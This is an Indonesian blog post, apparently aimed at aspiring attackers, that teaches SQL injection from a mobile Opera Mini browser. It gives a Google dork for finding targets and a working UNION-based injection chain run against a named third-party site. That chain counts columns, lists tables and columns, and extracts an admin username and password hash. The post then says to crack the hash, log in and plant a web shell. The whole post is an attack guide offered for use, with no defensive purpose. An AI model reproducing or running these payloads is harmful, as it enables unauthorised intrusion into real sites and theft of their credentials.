Unduh Adobe Flash player

Tutorial SQL Injection Via Opera Mini di HP

Selamat siang sobat blogger. Kali ini admin kece sharexid akan berbagi sedikit artikel tentang Tutorial SQL Injection Via Opera Mini di HP, atas permintaan agan agan para attacker. Disini admin cuma mengshare, bukan berbagi pengalaman hehee. Soalnya admin juga masih newbie dan polos :D Oke langsung saja ikuti langkah - langkahnya sobat.

Tutorial SQL Injection Versi Opera Mini di HP


1. Hp agan harus support opera mini bisa hp JAVA atau SYMBIAN.

2. Lebih baik gunakan opera mini versi 4 ke atas, seperti versi 5, 6, atau 7 ke atas. Karena versi tersebut sudah lengkap dan support Open tab.

3. Dan sekarang coba agan cari target di google search atau tekan #2, tinggal ketikkan dork SQL nya. Contoh : "inurl:readnews.php?id=" tanpa tanda petik, kemudian klik search.

4. Disitu terdapat banyak situs pada satu layar agan, coba anda cari satu persatu, mana yang vuln dan tidak. Caranya dengan tekan angka 1 pada link situs tersebut kemudian pilih Open New Tab.

5. Sebagai contoh saya pilih situs ini http://mostalocalcouncil.com/readnews.php?id=36 oke selanjutnya beri tanda petik ' pada akhir url. Seperti ini : http://mostalocalcouncil.com/readnews.php?id=36' dan terjadi error. Berarti situs tersebut vuln atau bisa di hack.

6. Proses selanjutnya gunakan kemahiran anda bermain SQL Injection. Sebenarnya sih gak perlu di ajarkan sqli disini. Tapi okelah mungkin masih ada yang belum paham dan saya harap bisa bermanfaat.

Sekarang kita cari tahu berapa kolom database nya. Caranya dengan menghapus tanda petik dan menggantinya dengan +order+by+1--

nb : gunakan tanda + untuk mengganti spasi, karena opmin tidak menerima url berspasi sperti browser pc Mozila.

Disini terjadi normal kembali dan selanjutnya kita paksa si situs untuk menunjukan jumlah kolom database nya. Dengan cara : ganti angka 1 dengan angka 10, jika terjadi error maka urutkan ke angka yang lebih kecil 9,8,7,6 hingga index normal, dan sebaliknya jika tidak terdapat error maka urutkan ke angka yang lebih tinggi.

Kita percepat saja. Kolom database si situs ternyata berakhir di angka 6. Jadi yang kita ambil adalah angka sebelumnya yaitu 5.

7. Langsung saja, ganti perintah =36+order+by+5-- dengan =-36+union+select+1,2,3,4,5-- sehingga muncul angka rahasia di index tersebut.
http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1%2C2%2C3%2C4%2C5--

dan muncul angka 2. Jadi sekarang kita ganti angka 2 di url dengan perintah "version()" atau "@@version" tanpa tanda petik, untuk melihat versi databasenya. Dan muncul lah angka 5.0.96-community, berarti kita bisa lanjutkan ke step berikutnya.

8. Ganti tulisan "version()" di url dengan "group_concat(table_name)" tanpa tanda petik, dan +from+information_schema.tables+where+table_schema=database()--

Contoh : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5+from+information_schema.tables+where+table_schema%3Ddatabase%28%29--

dan muncul banyak category seperti ini: adverts, announcements, articles, categories, news, pages, publications, security, users.

9. Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password admin, jadi kita ambil table "users" sebelumnya kata "users" tersebut kita convert dulu ke HEXA agar dapat dibaca oleh SQL di sini : http://snarkles.net/scripts/sneak/sneak.php

Ketik : users pilih ASCII to HEXA hasilnya : 7573657273 (hapus jika berspasi)
Perintah selanjutnya adalah ubah [group_concat(column_ name)] pada (table_name) dan [+from+information_schema.columns+where+table_name=0xHEXA--] di akhir URL. Ganti HEXA dengan hasil convert tadi yaitu : 7573657273 tambahkan 0x didepan HEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA Seperti ini : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1%2Cgroup_concat%28column_name%29%2C3%2C4%2C5+from+information_schema.columns+where+table_name%3D0x7573657273--

Kita berhasil menemukan kolom : id, username, password, name, email, lastlogin, ip.

Pilih kolom username dan password. Untuk melihat isi dari kolom tersebut ganti perintah [group_concat(username,0x3a,password)] pada (column_name) dan [+from +NAMATABLE--] pada akhir URL. 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke HEXA.

Hasilnya muncul user dan password website tersebut : admin:68b752263e82b3b1ee1ffe739ee0eec1.

Tinggal kita crack saja passwordnya di situs penyedia crack md5 seperti http://md5decrypter.co.uk atau masih banyak lagi search di google.

10. Oke tinggal kita cari login situsnya dan tanam shell. Untuk menanam shellnya bisa baca artikel tentang Cara Upload Shell Dengan SQLMAP.

11. Congratulation!

Sumber : Anonscreamouz - Sund4nyM0uz Corporation 

Sekian dulu artikel tentang Tutorial SQL Injection Via Opera Mini di HP. Selamat mencoba, semoga membantu dan semoga bermanfaat :) Happy Blogwalking

0 Response to "Tutorial SQL Injection Via Opera Mini di HP"

Posting Komentar

Formulir Kontak

Nama

Email *

Pesan *